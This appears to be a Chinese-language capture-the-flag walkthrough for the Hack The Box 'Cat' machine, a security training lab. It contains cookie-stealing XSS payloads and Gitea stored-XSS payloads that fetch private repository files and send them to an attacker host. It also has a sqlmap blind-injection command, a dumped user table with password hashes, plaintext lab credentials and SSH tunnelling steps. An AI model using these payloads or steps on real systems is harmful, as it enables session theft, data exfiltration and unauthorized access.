HTB Cat靶机WP

Cat

信息收集

nmap扫描:

❯ nmap -A 10.10.11.53
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-17 17:19 CST
Nmap scan report for 10.10.11.53
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 3389/tcp)
HOP RTT       ADDRESS
1   141.25 ms 10.10.16.1
2   141.44 ms 10.10.11.53

web信息:

❯ whatweb 'http://cat.htb/'
http://cat.htb/ [200 OK] Apache[2.4.41], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.41 (Ubuntu)], IP[10.10.11.53], Title[Best Cat Competition]

Target: http://cat.htb/

[17:24:16] Starting:
[17:24:30] 301 -  301B  - /.git  ->  http://cat.htb/.git/
[17:24:30] 403 -  272B  - /.git/branches/
[17:24:30] 403 -  272B  - /.git/
[17:24:30] 403 -  272B  - /.git/hooks/
[17:24:30] 200 -   23B  - /.git/HEAD
[17:24:30] 200 -    7B  - /.git/COMMIT_EDITMSG
[17:24:30] 200 -   92B  - /.git/config
[17:24:30] 200 -   73B  - /.git/description
[17:24:30] 200 -    2KB - /.git/index
[17:24:30] 200 -  240B  - /.git/info/exclude
[17:24:30] 403 -  272B  - /.git/info/
[17:24:30] 403 -  272B  - /.git/logs/
[17:24:30] 200 -  150B  - /.git/logs/HEAD
[17:24:30] 301 -  317B  - /.git/logs/refs/heads  ->  http://cat.htb/.git/logs/refs/heads/
[17:24:30] 200 -  150B  - /.git/logs/refs/heads/master
[17:24:30] 301 -  311B  - /.git/logs/refs  ->  http://cat.htb/.git/logs/refs/
[17:24:30] 301 -  312B  - /.git/refs/heads  ->  http://cat.htb/.git/refs/heads/
[17:24:30] 403 -  272B  - /.git/objects/
[17:24:30] 200 -   41B  - /.git/refs/heads/master
[17:24:30] 403 -  272B  - /.git/refs/
[17:24:30] 301 -  311B  - /.git/refs/tags  ->  http://cat.htb/.git/refs/tags/
[17:24:31] 403 -  272B  - /.ht_wsr.txt
[17:24:31] 403 -  272B  - /.htaccess.bak1
[17:24:31] 403 -  272B  - /.htaccess.orig
[17:24:31] 403 -  272B  - /.htaccess.sample
[17:24:31] 403 -  272B  - /.htaccess.save
[17:24:31] 403 -  272B  - /.htaccess_extra
[17:24:31] 403 -  272B  - /.htaccess_sc
[17:24:31] 403 -  272B  - /.htaccess_orig
[17:24:31] 403 -  272B  - /.htaccessOLD
[17:24:31] 403 -  272B  - /.htaccessBAK
[17:24:31] 403 -  272B  - /.htaccessOLD2
[17:24:31] 403 -  272B  - /.html
[17:24:31] 403 -  272B  - /.htm
[17:24:31] 403 -  272B  - /.htpasswds
[17:24:31] 403 -  272B  - /.htpasswd_test
[17:24:31] 403 -  272B  - /.httr-oauth
[17:24:35] 403 -  272B  - /.php
[17:24:50] 302 -    1B  - /admin.php  ->  /join.php
[17:25:22] 200 -    1B  - /config.php
[17:25:29] 301 -  300B  - /css  ->  http://cat.htb/css/
[17:25:46] 301 -  300B  - /img  ->  http://cat.htb/img/
[17:26:04] 302 -    0B  - /logout.php  ->  /
[17:26:38] 403 -  272B  - /server-status
[17:26:38] 403 -  272B  - /server-status/
[17:26:57] 301 -  304B  - /uploads  ->  http://cat.htb/uploads/
[17:26:57] 403 -  272B  - /uploads/

Task Completed

git泄露

明显存在git泄露.先把源码dump下来!

代码审计

先用个老爷爷正则工具浅浅看一下

if (isset($_POST['catId']) && isset($_POST['catName'])) {
    $cat_name = $_POST['catName'];
    $catId = $_POST['catId'];
    $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
    $pdo->exec($sql_insert);

其他地方的sql语句都做了预处理,唯独这个地方没做,cat_name是可控的~

但是这个页面做了鉴权处理!所以还是需要先拿到axel 用户!

sqlite数据库

注册逻辑

准备好一发xss

<script>document.location='http://10.10.16.52:9000/?c='+document.cookie;</script>

查看username将会在哪从数据库取出用到,造成store xss

找到只有contest.php处符合利用条件

随便填个表单即可,它自己会从数据库找的

然后填入cookie即可!

在之前那个地方再传一个猫即可,这样admin就可以看到了

然后点击Accept 即可触发到accept_cat.php

sql注入脱库

sqlmap -r 1.data --technique=BT --risk 3 --level 5 --batch --dbms=sqlite

一把梭~

盲注脱user表即可

Table: users
[11 entries]
+---------+-------------------------------+--------------------------------------+-----------------------------------------------------------------------------------+
| user_id | email                         | password                             | username                                                                          |
+---------+-------------------------------+--------------------------------------+-----------------------------------------------------------------------------------+
| 1       | axel2017@gmail.com            | d1bbba3670feb9435c9841e46e60ee2f     | axel                                                                              |
| 2       | rosamendoza485@gmail.com      | ac369922d560f17d6eeb8b2c7dec498c     | rosa                                                                              |
| 3       | robertcervantes2000@gmail.com | 42846631708f69c00ec0c0a8aa4a92ad     | robert                                                                            |
| 4       | fabiancarachure2323@gmail.com | 39e153e825c4a3d314a0dc7f7475ddbe     | fabian                                                                            |
| 5       | jerrysonC343@gmail.com        | 781593e060f8d065cd7281c5ec5b4b86     | jerryson                                                                          |
| 6       | larryP5656@gmail.com          | 1b6dce240bbfbc0905a664ad199e18f8     | larry                                                                             |
| 7       | royer.royer2323@gmail.com     | c598f6b844a36fa7836fba0835f1f6       | royer                                                                             |
| 8       | peterCC456@gmail.com          | e41ccefa439fc454f7eadbf1f139ed8a     | peter                                                                             |
| 9       | angel234g@gmail.com           | 24a8ec003ac2e1b3c5953a6f95f8f565     | angel                                                                             |
| 10      | jobert2020@gmail.com          | 88e4dceccd48820cf77b5cf6c08698ad     | jobert                                                                            |
| 11      | 1@qq.com                      | c4ca4238a0b923820dcc509a6f75849b (1) | <script>document.location='http://10.10.16.52:9000/?c='+document.cookie;</script> |

rosa@soyunaprincesarosa

水平提权,横向其他用户

没有user flag,得去其他用户看看

rosa@cat:~$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
fwupd-refresh:x:111:116:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
sshd:x:113:65534::/run/sshd:/usr/sbin/nologin
axel:x:1000:1000:axel:/home/axel:/bin/bash
rosa:x:1001:1001:,,,:/home/rosa:/bin/bash
git:x:114:119:Git Version Control,,,:/home/git:/bin/bash
jobert:x:1002:1002:,,,:/home/jobert:/bin/bash

rosa@cat:~$ groups
rosa adm
rosa@cat:~$ groups axel
axel : axel
rosa@cat:~$ groups jobert
jobert : jobert mail www-data

rosa@cat:~$ id
uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)

╔══════════╣ Mails (limit 50)
     3839      4 -rw-rw----   1 axel     mail         1961 Jan 14 16:49 /var/mail/axel
     3872      0 -rw-rw----   1 jobert   mail            0 Jan 14 16:54 /var/mail/jobert
    29987     36 -rw-------   1 root     mail        32535 Feb 17 11:59 /var/mail/root
     3839      4 -rw-rw----   1 axel     mail         1961 Jan 14 16:49 /var/spool/mail/axel
     3872      0 -rw-rw----   1 jobert   mail            0 Jan 14 16:54 /var/spool/mail/jobert
    29987     36 -rw-------   1 root     mail        32535 Feb 17 11:59 /var/spool/mail/root

这个密码没出来!

adm组提示去看日志

找到一个明文密码: axel @ aNdZwgC4tI9gnVXv_e3Q

看到邮件信息

axel@cat:/var/mail$ cat *
From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
        for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From rosa@cat.htb  Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

说人话是后面的admin会检测你的项目,然后你利用xss欺骗点击页面即可~

记得要发邮件给它,才会知道点击哪个仓库

echo -e "Subject: Re: New cat services & Employee management\nHi Rosa,\n\nThanks for the info. I’ll send Jobert the details of my Gitea repository shortly.\n\nRegarding the employee management system, you can check out the repository here: http://localhost:3000/axel/hello and review the README.\n\nBest, Axel" | sendmail jobert@cat.htb

是一个gitea服务

http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md

把3000端口穿透出来!

接着就是打洞了~

隧道搭建

靶机ip: 10.10.11.53

我的ip:10.10.16.52

法一:直接ssh隧道

本地执行

ssh -L 3000:127.0.0.1:3000 axel@cat.htb

输入账号密码即可转发远程靶机的3000端口服务到我本地的3000端口

法二:本题只需要开一个端口就不必这个法子了~

./proxy -laddr 0.0.0.0:3001 -selfcert

./agent -connect 10.10.16.52:3001 -ignore-cert

sudo ip tuntap del dev ligolo mode tun
sudo ip tuntap add user no0$ mode tun ligolo
sudo ip link set ligolo up

这个是go语言写的一个git服务,前几天打过!刚好有个xss

Version: 1.22.0

Gitea 1.22.0 - Stored XSS - Multiple webapps Exploit

跟着做~

登录后

description的地方写上xss payload

<a href="javascript:fetch('http://localhost:3000/administrator/Employee-management/raw/branch/main/index.php').then(response => response.text()).then(data => fetch('http://10.10.16.52:9000/?response=' + encodeURIComponent(data))).catch(error => console.error('Error:', error));">XSS test</a>

<a href='javascript:fetch("http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md").then(response=>response.text()).then(data=>fetch("http://10.10.16.52:9000/?d="+encodeURIComponent(btoa(unescape(encodeURIComponent(data))))));'>XSS test</a>

<?php
$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

if (!isset($_SERVER['PHP_AUTH_USER']) || !isset($_SERVER['PHP_AUTH_PW']) || 
    $_SERVER['PHP_AUTH_USER'] != $valid_username || $_SERVER['PHP_AUTH_PW'] != $valid_password) {
    
    header('WWW-Authenticate: Basic realm="Employee Management"');
    header('HTTP/1.0 401 Unauthorized');
    exit;
}

header('Location: dashboard.php');
exit;
?>

拿去登录root即可~